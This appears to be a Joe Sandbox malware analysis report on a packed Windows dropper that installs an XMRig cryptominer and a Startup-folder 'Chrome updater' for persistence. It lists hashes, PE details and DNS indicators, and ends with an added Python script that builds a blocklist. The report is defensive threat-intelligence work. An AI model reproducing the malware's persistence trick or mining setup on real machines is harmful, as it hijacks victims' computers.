SHA-512: F3408FF2DD7D6085CCBDBD837FD1439F5CD39028CB76F0067A0E0F0CE4044B3A8BFD1E1331438B5BD9AAD8331F76BB3C044AD72A87B97B1061C0E9F5F89645C9
Malicious: false

C:\Users\user\AppData\Local\lxoqz3o0.exe
Process: C:\Users\user\Desktop\8TD8GfTtaW.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2611424
Entropy (8bit): 7.959583416242755
Encrypted: false
SSDEEP: 49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
MD5: F0ECEFED65B00699CC2B57BF81492F56
SHA1: 4E0FBC13AF6C373C9944A53A40965517B619C274
SHA-256: 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
SHA-512: 83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 61%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\nulhfhsi.exe
Process: C:\Users\user\Desktop\8TD8GfTtaW.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4964504
Entropy (8bit): 7.901098351320417
Encrypted: false
SSDEEP: 98304:3Fo69yX+tlgGpThihQhFGooC309rxysgTNmYZHxgXVh:3vwweGfU4Uoz3YrxysghN1+j
MD5: 70DCA411445D3B4394D9C467BF3FF994
SHA1: 83F9120B2B184EB991D1DCBF4BB13D5F2F4A6097
SHA-256: 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
SHA-512: 4A2F84A8FB4BB0EBA8402EB417CADB8BCEF6AC309EE4918A698CAB756EA888FF076545E1ED02F85F5705FE15F7EB7EC01B68C3BC98F74B4E13F5B8E4F0184CD6
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 24%
• Antivirus: ReversingLabs, Detection: 66%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C................0.. ..........\d... ...@....@.. .............................d.K...@.................................0L..d........?............K..............................................................`..P........................... . ... ...................... ..` O....@......................@..@ ............................@..@.idata... ..........................@....apk0....@... ......................@..@.themida..(..`......................`....boot.........9.....................`..`.apk1....2....G.....................`..`.apk2... YE.. Z..\E.................`..`.reloc...............`E.............@..@.rsrc....?.......@...hE.............@..@........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
Process: C:\Users\user\AppData\Local\Temp\revs.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4602592
Entropy (8bit): 7.945985609581206
Encrypted: false
SSDEEP: 98304:QPvYDnmWwqsSgx0Yn+bQVacRCBdYPtON7x2ojsU2xLQ2dG:QPAmfSgx0Y+bQQB7x2ojszxLI
MD5: 029CE2E532FE5C70D3342F978F5463D0
SHA1: E4E3041B291F1E581DEEBC1C219E1DF3FCCC0A6B
SHA-256: 507A7B00E9FBE68E5DD732BEA1BCE17F0451AB6C1250970A7CF0DDF5FBC2B83E
SHA-512: 380EE1044A9FE7170965166DDDF5D8731301A3A681462FD4946F505E556B2A278CFEC09D9113B8DE4B75499BA27CBB04E8BC40374DD8ED0E1959BE3B20B972B1
Malicious: true

C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
Process: C:\Users\user\AppData\Local\lxoqz3o0.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true

C:\Users\user\AppData\Roaming\Windows\CPU\config.json
Process: C:\Users\user\AppData\Local\lxoqz3o0.exe
File Type: ASCII text
Category: dropped
Size (bytes): 2275
Entropy (8bit): 3.9887353957446137
Encrypted: false
SSDEEP: 48:CtWTHcfLWHW8b9b2lZ9lDfnncC519ECoECyo12udQdJtK59:CtWTGyHocCOCZCN2uYOH
MD5: DF3803B8B18481FBC63A8E2CECF22500
SHA1: B44877D6F781A28F1AD3F0CC337C9C3CC7BFFD96
SHA-256: B60A267608EA13830BFE41C7EE0F726A6562855112CF2310332DAD43854E370A
SHA-512: 8FAB13258B597C5363C727A3208426A17DC1D66AAEBEE4977B2B5C8EB4044F09626167A75E69831A45095CA2B8CFAAA57ECA6FEA93A643F43266943765F7538D
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, Author: Joe Security
Preview: {. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "astrobwt-max-size": 550,. "cn/0": false,. "cn-lite/0": false,. "kawpow": false. },. "opencl": {. "enabled": fal

C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
Process: C:\Users\user\AppData\Local\lxoqz3o0.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 6889640
Entropy (8bit): 7.882305690463656
Encrypted: false
SSDEEP: 196608:1YWVn8cTUWrpYpHqtbxxfDpidYLDH+D1W+4vYz3RVB:1YW2aJrpOHqtb4dYLDHtvY1j
MD5: E95F766A3748042EFBF0F05D823F82B7
SHA1: FA4A29F9B95F4491E07EBA54A677D52D8D061A19
SHA-256: 1AEF2FBA4058AD80E4AE16DCE0D2609E9F946BA9A4F2203891A26A92B3F6578C
SHA-512: E4D61199B57AE189C2BEF7ADC661224CFB00E9D6B3526C07624911238AAD2D81D9548B52DB1C6DBBF4A0E3F766D57080D2414CA836E037F0BB39728D1F1AF55C
Malicious: true

C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Process: C:\Users\user\AppData\Local\lxoqz3o0.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2611424
Entropy (8bit): 7.959583416242755
Encrypted: false
SSDEEP: 49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
MD5: F0ECEFED65B00699CC2B57BF81492F56
SHA1: 4E0FBC13AF6C373C9944A53A40965517B619C274
SHA-256: 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
SHA-512: 83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
Malicious: true

C:\Users\user\AppData\Roaming\Windows\cpu.zip
Process: C:\Users\user\AppData\Local\lxoqz3o0.exe
File Type: Zip archive data, at least v2.0 to extract
Category: dropped
Size (bytes): 6296834
Entropy (8bit): 7.9998772929856505
Encrypted: true
SSDEEP: 196608:EYt1C1WmUAsFnYtr+h3HbZe18JZPSXpzCC9o:EYMWDFnor+h3o18JZP8Po
MD5: E9695400A2205B4F8ECEB8B635BE7AA1
SHA1: 9071EF76AABFD7A05F7470460C4D92D89D4D2668
SHA-256: 66F209A9972C6E1A88E572697425A936A5DC028B2D8BC29FDDACA98FF25434B4
SHA-512: 5EDDF9D73675E327141B820ABBBC98336DE991D50AD5D30AA15F41DF10BBB9F0E47FFD57F8600F6B5CE0E319D463F9D40EF88E9D11C884121D56B2677E91E25A
Malicious: false

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.957151149611014
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 8TD8GfTtaW.exe
File size: 2649312
MD5: a5d3fdf55abb54ec0b632dee9d3459d4
SHA1: c177421eb77f0d341e5d1bd6cfbccb60e0c86a1c
SHA256: 677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f
SHA512: 4faafc484d66545a3355ba4d76da6dd021b556a06ec5b15fa8b4b8a4f1161b44ffad5e654991cf658fc6bd49b458e59586155dfdf339e1150b278ff5b9a41324
SSDEEP: 49152:isJSe3JHLCsRW6jvMtf66fjjSDmJz1nwIDcdAL4+wmvmgd3qwnfKkAeHYmGA5G8:Jge5HGsRWgvMV66Smh+IDcdAEAvmgE2T

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x858058
Entrypoint Section: .boot
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp: 0x603182EC [Sat Feb 20 21:45:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 4328f7206db519cd4e82283211d98e83

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 6/1/2017 5:00:00 PM
Not After: 7/8/2020 5:00:00 AM
Subject Chain: CN=Kaspersky Lab, O=Kaspersky Lab, L=Moscow, C=RU
Version: 3
Thumbprint MD5: D47ED7012E116270A767DA88438C3BA6
Thumbprint SHA-1: 3C92C9274AB6D3DD520B13029A2490C4A1D98BC0
Thumbprint SHA-256: 3606C42F2608526263AC61997AA0A83B364FB23A6882447CA787B5A5790115D8
Serial: 0F9D91C6ABA86F4E54CBB9EF57E68346

Entrypoint Preview

Instruction
call 00007FEF10D2B450h
push ebx
mov ebx, esp
push ebx
mov esi, dword ptr [ebx+08h]
mov edi, dword ptr [ebx+10h]
cld
mov dl, 80h
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FEF10D2B2ECh
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FEF10D2B353h
xor eax, eax
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FEF10D2B3E7h
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
je 00007FEF10D2B30Ah
push edi
mov eax, eax
sub edi, eax
mov al, byte ptr [edi]
pop edi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
jmp 00007FEF10D2B29Bh
mov eax, 00000001h
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FEF10D2B2ECh
sub eax, ebx
mov ebx, 00000001h
jne 00007FEF10D2B32Ah
mov ecx, 00000001h
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc ecx, ecx
add dl, dl
jne 00007FEF10D2B307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FEF10D2B2ECh
push esi
mov esi, edi
sub esi, ebp

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x803a           0x50          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa000           0x5e8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x283600         0x36e0        .themida
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name         Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
(not shown)  0x2000           0x2000        0xa00     False     0.952734375      data       7.60533357948   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
(not shown)  0x4000           0x5e8         0x400     False     0.9833984375     data       7.31959916585   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
(not shown)  0x6000           0xc           0x200     False     0.591796875      data       4.28205134805   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata       0x8000           0x2000        0x200     False     0.16796875       data       1.05072803613   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc        0xa000           0x2000        0x600     False     0.466145833333   data       4.30121514374   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida     0xc000           0x44c000      0x0       unknown   unknown          unknown    unknown         IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.boot        0x458000         0x281a00      0x281a00  unknown   unknown          unknown    unknown         IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

The names of the first three sections were not rendered in the extracted report (the report flags a section name containing special characters).

Resources

Name         RVA     Size   Type                                                                         Language  Country
RT_VERSION   0xa090  0x358  data
RT_MANIFEST  0xa3f8  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators  English   United States

Imports

DLL | Import
kernel32.dll | GetModuleHandleA
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright (c) iZSEcDETBb76bVZ 2020
Assembly Version | 9.7.3.8
InternalName | Loader.exe
FileVersion | 1.1.8.9
CompanyName | Paragon
Comments | kn6p3raejiB_BMU
ProductName | Sysinternals Procmon
ProductVersion | 1.1.8.9
FileDescription | 8_Xn2YM92vaLR6z
OriginalFilename | Loader.exe

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 09:11:04.331671000 CET | 192.168.2.5 | 8.8.8.8 | 0x22e1 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:05.043780088 CET | 192.168.2.5 | 8.8.8.8 | 0x9e21 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:05.320332050 CET | 192.168.2.5 | 8.8.8.8 | 0xd4b7 | Standard query (0) | blog.agencia10x.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:38.232750893 CET | 192.168.2.5 | 8.8.8.8 | 0xbd56 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.171906948 CET | 192.168.2.5 | 8.8.8.8 | 0xb30a | Standard query (0) | pool.minexmr.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:14.398189068 CET | 192.168.2.5 | 8.8.8.8 | 0xd753 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:14.476867914 CET | 192.168.2.5 | 8.8.8.8 | 0x2a0f | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:16.614902973 CET | 192.168.2.5 | 8.8.8.8 | 0x5693 | Standard query (0) | whois.iana.org | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:17.019965887 CET | 192.168.2.5 | 8.8.8.8 | 0x9399 | Standard query (0) | WHOIS.RIPE.NET | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:27.258008957 CET | 192.168.2.5 | 8.8.8.8 | 0xfc43 | Standard query (0) | blog.agencia10x.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:31.377082109 CET | 192.168.2.5 | 8.8.8.8 | 0xf01 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:32.110729933 CET | 192.168.2.5 | 8.8.8.8 | 0x90a0 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:32.182064056 CET | 192.168.2.5 | 8.8.8.8 | 0xcd15 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:44.136328936 CET | 192.168.2.5 | 8.8.8.8 | 0xf82a | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Feb 23, 2021 09:13:07.046222925 CET | 192.168.2.5 | 8.8.8.8 | 0x937e | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Feb 23, 2021 09:13:09.545461893 CET | 192.168.2.5 | 8.8.8.8 | 0x92b0 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 09:11:04.390167952 CET | 8.8.8.8 | 192.168.2.5 | 0x22e1 | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:05.101070881 CET | 8.8.8.8 | 192.168.2.5 | 0x9e21 | No error (0) | pastebin.com | | 104.23.99.190 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:05.101070881 CET | 8.8.8.8 | 192.168.2.5 | 0x9e21 | No error (0) | pastebin.com | | 104.23.98.190 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:05.381213903 CET | 8.8.8.8 | 192.168.2.5 | 0xd4b7 | No error (0) | blog.agencia10x.com | | 104.21.67.51 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:05.381213903 CET | 8.8.8.8 | 192.168.2.5 | 0xd4b7 | No error (0) | blog.agencia10x.com | | 172.67.213.210 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:38.289825916 CET | 8.8.8.8 | 192.168.2.5 | 0xbd56 | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 51.68.21.186 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 88.99.193.240 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 51.68.21.188 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 94.130.165.85 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 94.130.165.87 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 178.32.120.127 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 51.254.84.37 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:11:41.228872061 CET | 8.8.8.8 | 192.168.2.5 | 0xb30a | No error (0) | pool.minexmr.com | | 94.130.164.163 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:14.447170973 CET | 8.8.8.8 | 192.168.2.5 | 0xd753 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:12:14.528436899 CET | 8.8.8.8 | 192.168.2.5 | 0x2a0f | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:12:16.672480106 CET | 8.8.8.8 | 192.168.2.5 | 0x5693 | No error (0) | whois.iana.org | ianawhois.vip.icann.org | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:12:16.672480106 CET | 8.8.8.8 | 192.168.2.5 | 0x5693 | No error (0) | ianawhois.vip.icann.org | | 192.0.47.59 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:17.069293976 CET | 8.8.8.8 | 192.168.2.5 | 0x9399 | No error (0) | WHOIS.RIPE.NET | | 193.0.6.135 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:27.320939064 CET | 8.8.8.8 | 192.168.2.5 | 0xfc43 | No error (0) | blog.agencia10x.com | | 172.67.213.210 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:27.320939064 CET | 8.8.8.8 | 192.168.2.5 | 0xfc43 | No error (0) | blog.agencia10x.com | | 104.21.67.51 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:31.436317921 CET | 8.8.8.8 | 192.168.2.5 | 0xf01 | No error (0) | bitbucket.org | | 104.192.141.1 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:32.171631098 CET | 8.8.8.8 | 192.168.2.5 | 0x90a0 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:12:32.171631098 CET | 8.8.8.8 | 192.168.2.5 | 0x90a0 | No error (0) | s3-1-w.amazonaws.com | | 52.217.107.52 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:32.242243052 CET | 8.8.8.8 | 192.168.2.5 | 0xcd15 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:12:32.242243052 CET | 8.8.8.8 | 192.168.2.5 | 0xcd15 | No error (0) | s3-1-w.amazonaws.com | | 52.216.184.195 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:12:44.196438074 CET | 8.8.8.8 | 192.168.2.5 | 0xf82a | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:13:07.097923994 CET | 8.8.8.8 | 192.168.2.5 | 0x937e | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:13:09.605226040 CET | 8.8.8.8 | 192.168.2.5 | 0x92b0 | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
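
The DNS answers above are the raw material for turning this report into network indicators, and two details in them matter for that: some A records belong to a CNAME alias (ianawhois.vip.icann.org, s3-1-w.amazonaws.com) rather than to the name the sample queried, and the C2 peer 87.251.71.75:3214 from the dependency graph never appears in DNS at all. The Python below is an added example, not part of the Joe Sandbox report: it follows CNAME chains so each resolved IP is attributed to the queried name, tags domains by role, maps TCP peers back to domains (falling back to a "direct-ip" label), and emits a numerically sorted blocklist. DNS_ANSWERS is a subset of the table above; INDICATOR_TAGS (analyst judgement), SAMPLE_CONNECTIONS and the pool port 4444 are assumptions constructed for the example.

```python
"""Turn a sandbox DNS Answers table into network indicators (added example)."""
import ipaddress

# Subset of the DNS Answers rows above: (time, name, cname, address, type).
DNS_ANSWERS = [
    ("09:11:04.390", "iplogger.org", "", "88.99.66.31", "A"),
    ("09:11:05.101", "pastebin.com", "", "104.23.99.190", "A"),
    ("09:11:05.101", "pastebin.com", "", "104.23.98.190", "A"),
    ("09:11:05.381", "blog.agencia10x.com", "", "104.21.67.51", "A"),
    ("09:11:41.228", "pool.minexmr.com", "", "51.68.21.186", "A"),
    ("09:11:41.228", "pool.minexmr.com", "", "88.99.193.240", "A"),
    ("09:12:14.447", "api.ip.sb", "api.ip.sb.cdn.cloudflare.net", "", "CNAME"),
    ("09:12:16.672", "whois.iana.org", "ianawhois.vip.icann.org", "", "CNAME"),
    ("09:12:16.672", "ianawhois.vip.icann.org", "", "192.0.47.59", "A"),
    ("09:12:17.069", "WHOIS.RIPE.NET", "", "193.0.6.135", "A"),
    ("09:12:31.436", "bitbucket.org", "", "104.192.141.1", "A"),
]

# Constructed TCP peers: ports 443 and 3214 appear in the report, 4444 is assumed.
SAMPLE_CONNECTIONS = [
    ("192.168.2.5", "104.21.67.51", 443),
    ("192.168.2.5", "51.68.21.186", 4444),
    ("192.168.2.5", "87.251.71.75", 3214),
]

# Assumed role table (analyst judgement, not taken from the report).
INDICATOR_TAGS = {
    "pool.minexmr.com": "mining-pool",
    "pastebin.com": "dead-drop",
    "iplogger.org": "victim-tracking",
    "api.ip.sb": "ip-check",
    "whois.iana.org": "ip-check",
    "whois.ripe.net": "ip-check",
    "bitbucket.org": "payload-hosting",
}


def tag_domain(name):
    """Match a domain, case-insensitively, or any subdomain against INDICATOR_TAGS."""
    name = name.lower().rstrip(".")
    for suffix, tag in INDICATOR_TAGS.items():
        if name == suffix or name.endswith("." + suffix):
            return tag
    return "unclassified"


def canonical_resolver(answers):
    """Build alias -> queried-name links from CNAME rows and return a walker,
    so the A record for ianawhois.vip.icann.org is attributed to whois.iana.org.
    The seen-set guards against malformed circular chains."""
    alias_to_name = {}
    for _, name, cname, _, rtype in answers:
        if rtype == "CNAME" and cname:
            alias_to_name[cname.lower()] = name.lower()

    def canonical(n):
        n, seen = n.lower(), set()
        while n in alias_to_name and n not in seen:
            seen.add(n)
            n = alias_to_name[n]
        return n

    return canonical


def build_ip_map(answers):
    """IP -> queried domain. Unparseable addresses are skipped, not trusted:
    sandbox exports are text and rows can be truncated."""
    canonical = canonical_resolver(answers)
    ip_map = {}
    for _, name, _, addr, rtype in answers:
        if rtype != "A" or not addr:
            continue
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue
        ip_map[addr] = canonical(name)
    return ip_map


def classify_connections(answers, connections):
    """Label each (src, dst, port) peer with the domain that resolved to it.
    A peer with no matching answer was reached by hard-coded IP, which is
    the usual shape of a stealer C2 and the one worth pivoting on."""
    ip_map = build_ip_map(answers)
    result = []
    for _, dst, port in connections:
        domain = ip_map.get(dst)
        tag = tag_domain(domain) if domain else "direct-ip"
        result.append((dst, port, domain, tag))
    return result


def blocklist(answers, tags=("mining-pool", "dead-drop", "victim-tracking")):
    """Resolved IPs for the given roles, sorted numerically rather than as strings."""
    ip_map = build_ip_map(answers)
    return sorted((ip for ip, d in ip_map.items() if tag_domain(d) in tags),
                  key=ipaddress.ip_address)


if __name__ == "__main__":
    for row in classify_connections(DNS_ANSWERS, SAMPLE_CONNECTIONS):
        print(row)
    print("blocklist:", blocklist(DNS_ANSWERS))
```

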